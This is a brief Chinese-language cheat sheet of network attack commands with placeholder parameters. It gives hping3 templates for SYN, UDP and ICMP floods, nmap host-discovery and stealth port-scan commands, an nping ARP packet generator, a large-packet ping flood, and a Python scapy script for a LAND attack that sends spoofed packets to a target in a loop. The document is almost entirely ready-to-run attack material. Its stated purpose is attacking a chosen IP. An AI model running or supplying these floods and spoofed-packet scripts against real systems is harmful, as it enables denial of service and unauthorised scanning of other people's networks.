1.syn flood
hping3 -c {阈值} --faster -q -p {目的端口} -S {目的主机}
2.udp flood
hping3 -c {阈值} --faster -q -p {目的端口} -2 {目的主机}
3.icmp flood
hping3 -c {阈值} --faster -q -1 {目的主机}
4.ip扫描
nmap -sP --min-rate {阈值} --max-rate {阈值} {扫描网段}
5.端口扫描
ACK扫描:nmap -sA -T 5 --min-rate {阈值} {被攻击IP} -p1-1535
SYN扫描:nmap -sS -T 5 --min-rate {阈值} {被攻击IP} -p1-65535
6.arp
nping -N -H --arp --arp-type arp --arp-sender-ip {发送ip} --arp-target-ip {目的IP} --arp-target-mac {目的mac} -c {阈值} --rate {阈值*2} {目的ip}
7.null扫描
nmap -sN -T 5 --min-rate {阈值} {目的IP} -p1-65535
8.大包flood
ping –l 2048 X.X.X.X
9.land
import scapy.all as scapy #引入scapy库
import time
target = input("Please input your target:") #输入想要攻击的ip地址
port = input("Please input your target's port:") #输入端口
port = int(port) #因为input接收的是str,所以要转换成int型
send_packets=0 #记录发送包的数量
try:
while True:
a = (scapy.IP(src=target,dst=target)/scapy.TCP(sport=port,dport=port)) #构造LAND attack攻击包
scapy.send(a,verbose=False)
send_packets+=1 #发送一个,自动加一
print("[+] Sent Packets:" + str(send_packets))
time.sleep(1)
except KeyboardInterrupt:
print("[-] Ctrl+C detected.......")